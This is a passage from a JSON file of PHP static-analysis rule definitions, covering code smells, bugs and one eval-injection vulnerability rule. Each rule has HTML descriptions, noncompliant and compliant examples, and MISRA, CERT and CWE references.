remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should 
be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n  <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n  <li> Some value was left unset. <\/li>\n  <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) {  \/\/ Noncompliant\n  doSomething();\n}\n...\nif (false) {  \/\/ Noncompliant\n  doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n    const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n    const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. 
In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n  case 0:  \/\/ 6 lines till next case\n    methodCall1();\n    methodCall2();\n    methodCall3();\n    methodCall4();\n    break;\n  default:\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n  case 0:\n    doSomething();\n    break;\n  default:\n    break;\n}\n\nfunction doSomething(){\n  methodCall1(\"\");\n  methodCall2(\"\");\n  methodCall3(\"\");\n  methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n  $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n  $LOCAL;\n  ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n  $local;\n  ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n  return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n  return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n  function doSomething($a, $b) {     \/\/ no issue reported on $b\n    compute($a);\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. 
<\/li>\n  <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n  public function func($n,$m) {\n    parent::func($n$m);  \/\/ Noncompliant\n  }\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n  public function func($n,$m) {\n    parent::func($n$m);\n    \/\/ do additional things...\n  }\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n  \/\/ function eliminated\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure 
to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n  prepare('action1');                              \/\/ Non-Compliant - 'action1' is duplicated 3 times\n  execute('action1');\n  release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nACTION_1 = 'action1';\n\nfunction run() {\n  prepare(ACTION_1);\n  execute(ACTION_1);\n  release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having less than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. 
Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n  <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n  <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n  <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested classes dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n  class Foo {            \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n    \/**\n     * @var T1\n     *\/\n    public $a1;          \/\/ Foo is coupled to T1\n    \/**\n     * @var T2\n     *\/\n    protected $a2;       \/\/ Foo is coupled to T2\n    \/**\n     * @var T3\n     *\/\n    private $a3;         \/\/ Foo is coupled to T3\n\n    \/**\n     * @param T5\n     * @param T6\n     *\n     * @return T4\n     *\/\n    public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n      $result = new T7();     \/\/ Foo is coupled to T7\n      return $result;\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n  
executeSomething();\n  checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n  executeSomething();\n  checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v &gt; 2; };           \/\/ Compliant\n$max_comparator = 
function ($v) { echo $v; return $v &gt; 2; };  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n  <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n  <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n  <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. 
This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n} else {\n  throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n  <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n  <li> When the stop condition depend upon a method call <\/li>\n  <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n  if(condition) {\n    $i = 20;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n  loop. <\/li>\n  <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:  \/\/ Both 'doSomething()' and 'doSomethingElse()' will be executed. Is it on purpose ?\n    do_something();\n  default:\n    do_something_else();\n   break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:\n    do_something();\n    break;\n  default:\n    do_something_else();\n   break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n  case 0:                  \/\/ Empty case used to specify the same behavior for a group of cases.\n  case 1:\n    do_something();\n    break;\n  case 2:                  \/\/ Use of continue statement\n    continue;\n  case 3:                  \/\/ Case includes a jump statement (exit, return, break &amp;etc)\n    exit(0);\n  case 4:\n    echo 'Second case, which falls through';\n    \/\/ no break        &lt;- comment is used when fall-through is intentional in a non-empty case body\n  default:                 \/\/ For the last case, use of break statement is optional\n    doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n  case 0:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n  do_something();\n} else {\n  do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n  <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. 
<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) {  \/\/missing default clause\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n\nswitch ($param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements are a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n  if (condition1) {                  \/\/ Compliant - depth = 1\n    ...\n    if (condition2) {                \/\/ Compliant - depth = 2\n      ...\n      for ($i = 0; $i &lt; 10; $i++) {  \/\/ Compliant - depth = 3, not exceeding the limit\n        ...\n        if (condition4) {            \/\/ Non-Compliant - depth = 4\n          if (condition5) {          \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n            ...\n          }\n          return;\n        }\n      }\n   
 }\n  }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. 
The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. 
Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  $seconds = 0;   \/\/ $seconds is never used\n  return $hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  return $hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n  $duration = ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000 ;\n  return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n  return ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation<\/p>\n<blockquote>\n  <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. 
If you have\n  carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n  without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n  Evaluated Code ('Eval Injection') <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror prone. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. 
